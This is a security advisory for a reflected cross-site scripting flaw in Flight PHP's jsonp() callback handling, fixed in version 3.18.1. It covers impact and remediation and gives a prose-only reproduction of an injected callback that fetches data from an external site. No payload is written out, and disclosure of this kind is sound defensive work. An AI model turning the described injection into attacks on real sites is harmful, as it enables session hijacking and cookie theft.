Flight PHP Reflected Cross-Site Scripting Vulnerability in JSONP Callback Handling

A reflected cross-site scripting vulnerability has been identified in Flight PHP versions prior to 3.18.1. The issue arises in the Flight::jsonp() method, which improperly concatenates the ?jsonp= query parameter into the response body for application/javascript content type. This lack of validation allows an attacker to inject arbitrary JavaScript that executes in the context of the response origin.

Impact

Exploitation of this vulnerability allows for reflected cross-site scripting, where injected JavaScript executes in the context of the user visiting the affected page. This can lead to cookie theft and session hijacking, especially if the vulnerable JSONP endpoint is called from a same-origin page.

Reproduction

To reproduce this vulnerability, send a GET request to an API endpoint that uses Flight::jsonp(). Include a crafted ?jsonp= parameter that injects JavaScript, such as a function that fetches data from an external site. When this script is loaded in a same-origin context, the injected JavaScript will execute, demonstrating the cross-site scripting vulnerability.

Remediation

Users can upgrade to Flight PHP version 3.18.1 or later, where this vulnerability has been fixed. The patched version validates the JSONP callback name before including it in the response.